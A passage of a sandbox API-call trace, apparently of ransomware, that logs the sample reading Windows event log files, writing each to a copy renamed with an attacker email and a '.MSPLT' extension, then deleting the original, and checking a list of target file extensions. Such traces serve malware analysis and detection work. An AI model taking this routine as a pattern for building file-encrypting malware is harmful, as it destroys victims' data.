SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0289.470] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx")) returned 1 [0289.487] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.487] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.487] lstrlenW (lpString=".doc") returned 4 [0289.487] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.487] lstrlenW (lpString=".docx") returned 5 [0289.487] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.487] lstrlenW (lpString=".pdf") returned 4 [0289.487] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.487] lstrlenW (lpString=".xls") returned 4 [0289.487] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.487] lstrlenW (lpString=".xlsx") returned 5 [0289.487] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.487] lstrlenW (lpString=".ppt") returned 4 [0289.487] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.487] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.487] lstrlenW (lpString=".zip") returned 4 [0289.487] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.487] lstrlenW (lpString=".rar") returned 4 [0289.511] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.511] lstrlenW (lpString=".bz2") returned 4 [0289.512] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.512] lstrlenW (lpString=".7z") returned 3 [0289.512] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.512] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.512] lstrlenW (lpString=".dbf") returned 4 [0289.512] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.512] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.512] lstrlenW (lpString=".1cd") returned 4 [0289.512] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.512] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.512] lstrlenW (lpString=".jpg") returned 4 [0289.512] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.512] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.512] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.512] lstrlenW (lpString=".doc") returned 4 [0289.512] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.512] lstrlenW (lpString=".docx") returned 5 [0289.512] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.512] lstrlenW (lpString=".pdf") returned 4 [0289.512] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.512] lstrlenW (lpString=".xls") returned 4 [0289.513] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.513] lstrlenW (lpString=".xlsx") returned 5 [0289.513] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.513] lstrlenW (lpString=".ppt") returned 4 [0289.513] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.513] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.513] lstrlenW (lpString=".zip") returned 4 [0289.513] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.513] lstrlenW (lpString=".rar") returned 4 [0289.513] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.513] lstrlenW (lpString=".bz2") returned 4 [0289.513] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.513] lstrlenW (lpString=".7z") returned 3 [0289.513] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.513] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.513] lstrlenW (lpString=".dbf") returned 4 [0289.513] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.513] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.513] lstrlenW (lpString=".1cd") returned 4 [0289.513] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.513] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 57 [0289.513] lstrlenW (lpString=".jpg") returned 4 [0289.514] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.514] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0289.514] lstrlenW (lpString="Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 54 [0289.514] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0289.514] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0289.514] CloseHandle (hObject=0x3b0) returned 1 [0289.515] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx")) returned 0x20 [0289.515] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0289.515] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0289.515] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.515] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.515] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0289.516] GetLastError () returned 0x0 [0289.516] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0289.527] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0289.531] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0289.531] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x140, lpOverlapped=0x0) returned 1 [0289.531] SetEndOfFile (hFile=0x454) returned 1 [0289.531] CloseHandle (hObject=0x454) returned 1 [0289.537] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.537] SetEndOfFile (hFile=0x3b0) returned 1 [0289.540] CloseHandle (hObject=0x3b0) returned 1 [0289.540] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0289.540] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx")) returned 1 [0289.541] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.541] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.541] lstrlenW (lpString=".doc") returned 4 [0289.541] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.541] lstrlenW (lpString=".docx") returned 5 [0289.541] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.541] lstrlenW (lpString=".pdf") returned 4 [0289.541] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.541] lstrlenW (lpString=".xls") returned 4 [0289.541] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.541] lstrlenW (lpString=".xlsx") returned 5 [0289.541] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.542] lstrlenW (lpString=".ppt") returned 4 [0289.542] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.542] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.542] lstrlenW (lpString=".zip") returned 4 [0289.542] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.542] lstrlenW (lpString=".rar") returned 4 [0289.542] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.542] lstrlenW (lpString=".bz2") returned 4 [0289.542] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.542] lstrlenW (lpString=".7z") returned 3 [0289.542] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.542] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.542] lstrlenW (lpString=".dbf") returned 4 [0289.542] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.542] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.542] lstrlenW (lpString=".1cd") returned 4 [0289.542] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.542] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.542] lstrlenW (lpString=".jpg") returned 4 [0289.543] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.543] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.543] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.543] lstrlenW (lpString=".doc") returned 4 [0289.543] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.543] lstrlenW (lpString=".docx") returned 5 [0289.543] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.543] lstrlenW (lpString=".pdf") returned 4 [0289.543] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.543] lstrlenW (lpString=".xls") returned 4 [0289.543] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.543] lstrlenW (lpString=".xlsx") returned 5 [0289.543] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.543] lstrlenW (lpString=".ppt") returned 4 [0289.543] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.543] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.543] lstrlenW (lpString=".zip") returned 4 [0289.543] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.544] lstrlenW (lpString=".rar") returned 4 [0289.544] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.544] lstrlenW (lpString=".bz2") returned 4 [0289.544] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.544] lstrlenW (lpString=".7z") returned 3 [0289.544] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.544] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.544] lstrlenW (lpString=".dbf") returned 4 [0289.544] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.544] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.544] lstrlenW (lpString=".1cd") returned 4 [0289.544] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.544] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 62 [0289.544] lstrlenW (lpString=".jpg") returned 4 [0289.544] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.545] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0289.545] lstrlenW (lpString="Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 41 [0289.545] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0289.545] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0289.545] CloseHandle (hObject=0x3b0) returned 1 [0289.545] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx")) returned 0x20 [0289.546] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0289.546] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0289.546] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.546] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.546] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0289.547] GetLastError () returned 0x0 [0289.547] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0289.921] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0289.925] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0289.925] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x126, lpOverlapped=0x0) returned 1 [0289.926] SetEndOfFile (hFile=0x454) returned 1 [0289.926] CloseHandle (hObject=0x454) returned 1 [0289.932] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.932] SetEndOfFile (hFile=0x3b0) returned 1 [0289.936] CloseHandle (hObject=0x3b0) returned 1 [0289.936] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0289.936] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx")) returned 1 [0289.937] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.937] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.937] lstrlenW (lpString=".doc") returned 4 [0289.937] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.937] lstrlenW (lpString=".docx") returned 5 [0289.937] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.938] lstrlenW (lpString=".pdf") returned 4 [0289.938] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.938] lstrlenW (lpString=".xls") returned 4 [0289.938] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.938] lstrlenW (lpString=".xlsx") returned 5 [0289.938] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.938] lstrlenW (lpString=".ppt") returned 4 [0289.938] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.938] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.938] lstrlenW (lpString=".zip") returned 4 [0289.938] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.939] lstrlenW (lpString=".rar") returned 4 [0289.939] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.939] lstrlenW (lpString=".bz2") returned 4 [0289.939] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.939] lstrlenW (lpString=".7z") returned 3 [0289.939] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.939] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.939] lstrlenW (lpString=".dbf") returned 4 [0289.939] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.939] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.939] lstrlenW (lpString=".1cd") returned 4 [0289.939] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.939] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.939] lstrlenW (lpString=".jpg") returned 4 [0289.939] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.940] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.940] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.940] lstrlenW (lpString=".doc") returned 4 [0289.940] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0289.940] lstrlenW (lpString=".docx") returned 5 [0289.940] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0289.940] lstrlenW (lpString=".pdf") returned 4 [0289.940] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0289.940] lstrlenW (lpString=".xls") returned 4 [0289.940] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0289.940] lstrlenW (lpString=".xlsx") returned 5 [0289.940] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0289.940] lstrlenW (lpString=".ppt") returned 4 [0289.940] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0289.940] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.941] lstrlenW (lpString=".zip") returned 4 [0289.941] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0289.941] lstrlenW (lpString=".rar") returned 4 [0289.941] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0289.941] lstrlenW (lpString=".bz2") returned 4 [0289.941] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0289.941] lstrlenW (lpString=".7z") returned 3 [0289.941] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0289.941] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.941] lstrlenW (lpString=".dbf") returned 4 [0289.941] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0289.942] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.942] lstrlenW (lpString=".1cd") returned 4 [0289.944] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0289.944] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0289.944] lstrlenW (lpString=".jpg") returned 4 [0289.944] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0289.944] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0289.944] lstrlenW (lpString="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 49 [0289.944] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0289.946] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0289.946] CloseHandle (hObject=0x3b0) returned 1 [0289.946] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx")) returned 0x20 [0289.946] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0289.946] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0289.947] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.947] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.947] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0289.948] GetLastError () returned 0x0 [0289.948] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0289.953] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0290.322] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0290.324] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x136, lpOverlapped=0x0) returned 1 [0290.324] SetEndOfFile (hFile=0x454) returned 1 [0290.324] CloseHandle (hObject=0x454) returned 1 [0290.328] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.328] SetEndOfFile (hFile=0x3b0) returned 1 [0290.330] CloseHandle (hObject=0x3b0) returned 1 [0290.330] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0290.330] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx")) returned 1 [0290.331] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.331] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.331] lstrlenW (lpString=".doc") returned 4 [0290.331] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.331] lstrlenW (lpString=".docx") returned 5 [0290.331] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.331] lstrlenW (lpString=".pdf") returned 4 [0290.331] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.331] lstrlenW (lpString=".xls") returned 4 [0290.331] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.331] lstrlenW (lpString=".xlsx") returned 5 [0290.331] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.331] lstrlenW (lpString=".ppt") returned 4 [0290.331] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.331] lstrlenW 